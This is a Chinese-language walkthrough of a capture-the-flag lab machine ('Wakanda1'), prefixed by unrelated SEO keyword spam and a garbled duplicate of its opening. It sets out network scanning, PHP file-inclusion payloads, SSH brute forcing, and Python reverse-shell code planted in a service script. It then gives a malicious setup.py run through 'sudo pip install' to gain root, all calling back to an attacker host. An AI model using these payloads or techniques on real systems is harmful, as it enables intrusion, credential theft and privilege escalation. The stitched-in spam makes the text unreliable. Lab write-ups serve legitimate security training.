濮阳住房和城乡建设部网站,庆阳市建设工程网上投标网站,做盗链网站,如何应对网络舆情一、信息收集
信息收集非常重要#xff0c;有了信息才能知道下一步该如何进行#xff0c;接下来将用 nmap 来演示信息收集
1、nmap 扫描存活 IP
由于本项目环境是 nat 模式需要项目 IP 地址#xff0c;扫描挖掘本地的 IP 地址信息#xff1a; 本机 IP 为#xff1a;192…一、信息收集
信息收集非常重要有了信息才能知道下一步该如何进行接下来将用 nmap 来演示信息收集
1、nmap 扫描存活 IP
由于本项目环境是 nat 模式需要项目 IP 地址扫描挖掘本地的 IP 地址信息 本机 IP 为192.168.40.177。
发现本 kali ip 为 40 段用 40 段进行全网段扫描 nmap -sP 192.168.40.0/24 Nmap scan report for localhost (192.168.40.190) 发现项目 IP 地址192.168.40.190。
2、nmap 全端口服务枚举
进行 namp 端口服务枚举 nmap -p- 192.168.40.19 得到开放的端口信息
80/tcp open http
111/tcp open rpcbind
3333/tcp open dec-notes ssh OpenSSH 6.7p1
47046/tcp open unknown开启了 80、111 和 3333 端口继续探测下端口信息 nmap 192.168.40.190 -p80,111,3333,35523 -A -T5 可以详细看到端口开启的版本信息就从 web 页面信息枚举信息
3、web 信息枚举
访问 web 页面 http://192.168.40.190/ 没有什么可用信息扫描下目录枚举下信息。
4、dirb 目录扫描
dirb 扫描目录 dirb http://192.168.40.190/ dirb 扫出的目录都是访问空白页面
查看主页的静态源码发现 ?lang 出现这种形式很可能是 sql 注入或文件包含
访问下该目录 http://192.168.40.190/?langfr 发现跳转回了主页
利用 dirb 扫描 dirb http://192.168.40.190/?lang 发现存在 fr 和 index
http://192.168.40.190/?langfr http://192.168.40.190/?langindex尝试访问 fr.php 和 index.php发现都跳转回主页 http://192.168.40.190/?langfr 通过抓包分析curl 测试是否存在文件包含响应
curl -i http://192.168.40.190/?langfr
curl -i http://192.168.40.190/?langindex
-i ----include 在输出中包含协议响应头对比发现
fr HTTP/1.1 200 OK
indexHTTP/1.0 500 Internal Server Error疑似存在文件包含该文件底层可能存在 inclu()函数开始测试
三、文件包含
通过过滤器方法绕过枚举出需要读的文件信息。
PHP 存在四种过滤器PHP 过滤器用于验证和过滤来自非安全来源的数据比如用户的输入。1字符串过滤器字符串过滤器就是用户输入的内容会转换为大写、小写、ROT13 字符、或者去除 php 标记等功能。2转换过滤器就是用户输入的数据转换为 base64 编码和解码功能还有将字符串转换为 8-bit 字符串功能。3压缩过滤器zip 中有 zlib 和 bzip2 等函数协议功能就是在用户传输中会有压缩文件做一些压缩函数转换功能。4加密过滤器 mcrypt 是 php 里面重要的加密支持扩展库主要是用 mcrypt 扩展库中各种加密函数对用户输入内容进行转换功能。
那么不管是哪些过滤器都可以尝试下面六种方法去操作测试是否可以进行文件包含
/index.php?page/etc/passwd
/index.php?page.. /../../../../../etc/passwd
index.php?pagephp://filter/read
/index.php?pagephp://filter/convert.base64-encode/resource
/index.php?pagezip://
pagedata://用过滤器测试下文件包含
curl http://192.168.40.190/?langphp://filter/convert.base64-encode/resourceindex | head -n 1 | base64 -d获得密码
Niamey4Ever227!!!但是不知道是哪个用户的密码爆破 ssh 获得用户名
四、ssh 用户名枚举爆破
1、cewl 枚举用户名 cewl http://192.168.40.190/ 2、暴力破解 ssh
利用实战常用的gorailgun.exe
记得修改下端口 项目 ssh 端口为 3333 成功获得用户mamadou
五、内部信息枚举
1、ssh 登录
ssh mamadou192.168.40.190 -p 3333
Niamey4Ever227!!!输入进来发现这是Python 2.7.9 的命令框
通过 python 获得 bash 正常 shell
import pty;
pty.spawn(/bin/bash);获得正常 shell
2、脚本信息枚举
开启 http 服务上传扫描脚本 linpeas.sh
python -m SimpleHTTPServer 8081
wget http://192.168.40.177:8081/linpeas.sh上传成功
赋权并执行脚本linpeas.sh 信息枚举
chmod x linpeas.sh
./linpeas.sh发现如下新信息
发现新用户是 1002说明包含了 2 个权限uid1001(devops) gid1002(developer) groups1002(developer)
root 权限 pipPIP 是 Python 包或模块的包管理器包含模块所需的所有文件rwxr-sr-- 1 root developer 281 Feb 27 2015 /usr/bin/pip
3、find 深入枚举
1mamadou 用户信息枚举
利用 find 针对 mamadou 查看可运行权限文件
/ ---反斜杠从根目录开始查询
-user mamadou ---搜索普通该用户权限的文件
21 ----将所有错误信息重定向不输出过滤掉
-v ---就是过滤错误的输出发现 flag1
cat /home/mamadou/flag1.txt Flag : d86b9ad71ca887f4dd1dac86ba1c4dfc
2devops 用户信息枚举
通过前面脚本枚举还发现存在另一个用户devops也利用 find 针对 devops 查看其可运行权限文件
find / -user devops 21 | grep -v Permission denied\|proc 返回三个信息具体查看下
/srv/.antivirus.py
/tmp/test
/home/devops/flag2.txt这里返现三个可疑信息
尝试打开 flag2.txtcat /home/devops/flag2.txt 提示无权限打开
尝试打开 antivirus.py
cat /srv/.antivirus.py 发现这是一个可读可写的 python 脚本
open(/tmp/test,w).write(test)
查看下 antivirus 是否存在计划任务启动该脚本
find / -name *antivirus* 21 | grep -v Permission denied\|proc 发现存在 antivirus.service 服务
查看下该服务内容
cat /lib/systemd/system/antivirus.service 提示存在该服务存在计划任务每 5 分钟 devops 用户执行一次
RestartSec300 ---300秒运行一次
Userdevops ---这是devops用户运行接下来利用该计划任务来编译反弹 shell
六、计划任务反弹 shell
1、写入计划任务
本地开启 nc 端口
nc -tvlp 9999 nano 写入反弹 shell
nano /srv/.antivirus.py写入以下shell
#!/usr/bin/python
def con():import socket, time,pty, oshost192.168.40.177port9999ssocket.socket(socket.AF_INET,socket.SOCK_STREAM)s.settimeout(10)s.connect((host,port))os.dup2(s.fileno(),0)os.dup2(s.fileno(),1)os.dup2(s.fileno(),2)os.putenv(HISTFILE,/dev/null)pty.spawn(/bin/bash)s.close()
con()等 5 分钟成功反弹 devops 用户 shell 七、内部信息枚举--devops
1、组信息枚举
cat /etc/group developer1002: ---可看到还存在 group 组里的 developer
2、find 查看权限文件
利用 find 针对 developer 查看可运行权限文件
find / -group developer 21 | grep -v Permission denied\|proc 发现存在/usr/bin/pip 可运行文件和 flag2
3、获取 flag
cat /home/devops/flag2.txt Flag 2 : d8ce56398c88e1b4d9e5f83e64c79098
在整个目录中枚举 devops
grep -rn / -e devops 21 | grep -v Permission denied\|proc 没发现新的东西但是可看到 devops 的 ID 为 1002 是共用的
/etc/subgid:11:devops:755360:65536
/etc/group:56:devops:x:1001:
/etc/passwd:29:devops:x:1001:1002:,,,:/home/devops:/bin/bash
/etc/subuid:11:devops:755360:655364、sudo 提权
尝试 sudo 提权
sudo -l 提示用户可以在/usr/bin/pip 执行 sudo
User devops may run the following commands on Wakanda1: (ALL) NOPASSWD: /usr/bin/pip
八、pip 提权
pip 可执行 sudo 提权那就利用 pip 写入 py 脚本运行
开启 nc 反弹 shell
nc -vlp 4455 本地添加设置脚本 setup.py
将 host 更改为本地 kali 地址端口随拟。
gedit setup.py写入以下py脚本
from setuptools import setupimport socket,subprocess,osdef con():import socket, time,pty, oshost192.168.40.177port4455ssocket.socket(socket.AF_INET,socket.SOCK_STREAM)s.settimeout(10)s.connect((host,port))os.dup2(s.fileno(),0)os.dup2(s.fileno(),1)os.dup2(s.fileno(),2)os.putenv(HISTFILE,/dev/null)pty.spawn(/bin/bash)s.close()
con()setup(nameroot, version1.0)配置成功
到 tmp 目录下上传 setup.py 脚本至靶机
cd /tmp
wget http://192.168.40.177:8081/setup.py上传成功
sudo 运行脚本 setup.py
sudo pip install setup.py . 成功获得反弹 shell
获得 flag
cd /root
cat root.txtflag821ae63dbe0c573eff8b69d451fb21bc
提权 pip拓展思路
poc[https://github.com/0x00-0x00/FakePip](https://github.com/0x00-0x00/FakePip)用代理下载 FakePip 包
proxychains git clone https://github.com/0x00-0x00/FakePip.git 下载成功
查看脚本机制并配置参数
cd FakePip
cat setup.py
gedit setup.py将 lhost 改为本地 kali 地址端口可不变
192.168.40.177
13372
